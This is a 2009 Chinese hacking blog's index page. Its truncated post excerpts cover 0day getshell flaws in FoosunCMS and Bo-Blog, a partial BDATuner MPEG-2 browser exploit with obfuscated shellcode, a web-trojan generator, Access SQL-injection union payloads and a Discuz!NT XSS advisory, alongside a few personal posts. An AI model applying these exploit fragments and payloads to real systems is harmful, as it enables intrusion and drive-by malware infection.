颓废の傻鱼'S Blog

RSS最新信息

用户未订阅RSS信息

[置顶公告]

百度搜索

文章列表

风讯 4.0 SP7 getshell 0day

2009/07/12 17:52

发现者：bloodsword、bink，转载请无视
影响版本：<=4.0 sp7，前面的版本没去看，估计也能日。
利用条件，开启了文件上传功能，iis6环境。

漏洞描述：建立目录的地方，名称过滤上有失误，导致可以绕过过滤建立一个.asp目录
首先注册个账号访问http://www.bbb.com/User/CommPages/FolderImageList.asp?

阅读全文>>

类别：╱/.0day漏洞oΟ | 评论(0) | 浏览()

Win2000惊爆大漏洞

2009/07/12 17:50

不知大家是否了解win2000有一个默认共享的功能，据微软自己说那是为了管理的方便。但笔者今天发现这个功能可以轻易的被攻破，从而控制你的计算机和窃取你的商业秘密。这一次，网络上所有的计算机都变的不安全起来了。

　　只要用几个小工具，我们就能够轻易的侵入一台计算机，并完全控制它。现在让我们来看一下这个过程吧。首先入侵的计算机也必须是win2000(professional，server，advancedserver)都可以。想入侵一台计算机首先要知道它的IP，而我们这次是为了试验普遍性，就用了一个扫描工具。我们可以从qq那里知道别人

阅读全文>>

类别：╱/.0day漏洞oΟ | 评论(2) | 浏览()

黑洞的ASP上线系统的一个漏洞

2009/07/12 17:49

在默认的情况下，利用该漏洞可得到上线系统所在服务器的webshell

ASP上线系统中保存上线IP信息的数据库的扩展名默认为asp

写入配置时对参数未作检查，setip.asp相关代码

<%
strIP=Trim(Request.QueryString("Ip"))
strPort=Trim(Request.QueryString("Port"))
strType=Trim(Request.QueryString("Type"))

if strType="0" then
strIP=Request.ServerVariables("REMOTE_HOST")
end if

sql="select * from Info

阅读全文>>

类别：╱/.网络转载оΟ | 评论(0) | 浏览()

这辈子第三次数据丢失

2009/07/12 17:44

怎么说的，我都无语了，为了分析那个MPEG-2的漏洞，特意跑360上面找挂马地址，然后分析了好多

东有用的东西，但是我那该死的系统他妈没有修复这个漏洞，很倒霉，弄的那个挂马地址，很多游戏木马，

虽然我还开着影子系统，可惜那他妈的不管用了，全部被穿透了，最后系统又中毒了。中毒了肯定得恢复

备份的，可惜该死的不知道怎么的，我在启动的时候找不到恢复的镜像了，最后用朋友的光盘里面GHOST

找到恢复镜像，可是噩梦才开始了，恢复后只有一个盘，这时我才知道

阅读全文>>

类别：╱/.心情随笔оΟ | 评论(3) | 浏览()

JavaScript中的writeln

2009/07/09 01:09

其实write 和 writeln是没啥区别的，只是后者在输出内容后多加换行符而已

在分析一点代码中看到这么一段代码，如下

document.writeln("<script type=\"text\/javascript\" src=\"http:\/\/js.tongji.linezing.com\/1136402\/tongji.js\"><\/script>");

咋一看都看不明白格式，百度了一下也没找到，最后在一CSDM上看到一篇文档，差不多可以理解了

上面的“\”叫做续行符，我自己理解是连接符，相当+号一样，不过还是有点不明白，明天再查资料

阅读全文>>

类别：╱/.学习手记оΟ | 评论(2) | 浏览()

恭喜我的系统可以种MPEG-2 0DAY

2009/07/08 22:09

N年没打漏洞这漏洞还是知道，不过360也没提示修复，我日死了

今天无聊拿暗组那个MPEG-2网马生成器生成一个马，测试了一下。。。

结果，我用计算器测试，IE7卡了一小下，可爱的计算器呈现出来了，操

赶紧补洞，这漏洞还是挺严重的！！

类别：默认分类 | 评论(11) | 浏览()

关于绿坝，上个图吧

2009/07/07 14:34

我靠也太搞了呵呵啥都不说绿坝这东西还是不得人心

类别：默认分类 | 评论(19) | 浏览()

BDATuner.MPEG2TuneRequest Stack Overflow Exploit

2009/07/07 14:00

发布时间:2009-07-06

测试方法:

[www.sebug.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

var appllaa='0';
var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;
var dashell=unescape(nndx+"%u03eb%ueb59%ue805%ufff8%uff

阅读全文>>

类别：╱/.0day漏洞oΟ | 评论(1) | 浏览()

MPEG-2网马生成器

2009/07/07 13:59

漏洞说明：
引用:
这个MPEG-20Day漏洞要容易利用得多，而且黑客不再需要网民运行

阅读全文>>

类别：╱/.0day漏洞oΟ | 评论(19) | 浏览()

传说中我活了，冒个泡

2009/07/06 18:50

好久没上来了，今天上来透个气，考试完了也放假了，有时间上来更新东西了

各位兄弟姐妹可好？

类别：╱/.心情随笔оΟ | 评论(34) | 浏览()

access偏移注入

2009/06/30 11:03

作者：zake

此方法解决%90注入得到表的不到字段的网站，衷心感谢兄弟2月30日讨论！

我举动力文章的例子，他的是28个字段，加入admin表5个字段，那么

union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin

* 就是5个字段？这样来爆ad

阅读全文>>

类别：╱/.入侵渗透оΟ | 评论(2) | 浏览()

Bo-Blog 2.0.3 注射漏洞

2009/06/27 12:48

BY Flyh4t
http://bbs.wolvez.org

上次硬盘坏了丢了很多数据

今天某兄弟生日

掏空我的记忆回想起来一个很老的漏洞

阅读全文>>

类别：╱/.0day漏洞oΟ | 评论(13) | 浏览()

Bo-Blog 2.0.3 后台插马执行任意命令漏洞

2009/06/27 12:40

文章出处：http://hi.baidu.com/540410588/ &&www.slenk.net
文章作者：孤水绕城
今天分析了下Bo-Blog 2.0.3的代码，事件是由这个版本的Flyh4t大牛发布的一个已知注入漏洞开始的。进后台捣鼓半天，又看了下代码，真让我发现了Bo-Blog 2.0

阅读全文>>

类别：╱/.0day漏洞oΟ | 评论(2) | 浏览()

U盘隐藏文件属性无法修改解决办法

2009/06/22 20:26

里面的所有文件夹都设置了隐藏属性，而且还不可更改，上网搜索后得如下解决方法，亲测可行。

打开CMD（命令行）窗口。
在命令行下输入：
for /f "delims=" %i in ('dir /b /ad H:') do attrib "H:\%i" -r -s -h /s /d

呵呵

阅读全文>>

类别：╱/.网络转载оΟ | 评论(8) | 浏览()

Discuz!NT论坛多个文件变量过滤不严导致XSS攻击（Bugging 首发）

2009/06/20 10:56

信息来源：
Bugging Security Team漏洞时代安全技术小组 [B.S.T]
官方地址:http://bugging.com.cn
影响版本：
Powered by Discuz!NT 2.6 以下
程序介绍：
Discuz!NT 是康盛创想(北京)科技有限公司旗下的一款功能强大的基于 ASP.net 平台的社区软件。基于先进的 .Net Framework，默认支持 SQLServer数据库，可扩展支持Access、MySQL等多种数据库，支持IIS5、IIS6、IIS7，安全高效、稳定易用，充分发挥 ASP.net 特性，支持自由选择切换皮肤，支持多种其它论坛的数据转换。 ~dLbhjde n

漏洞

阅读全文>>

类别：╱/.0day漏洞oΟ | 评论(3) | 浏览()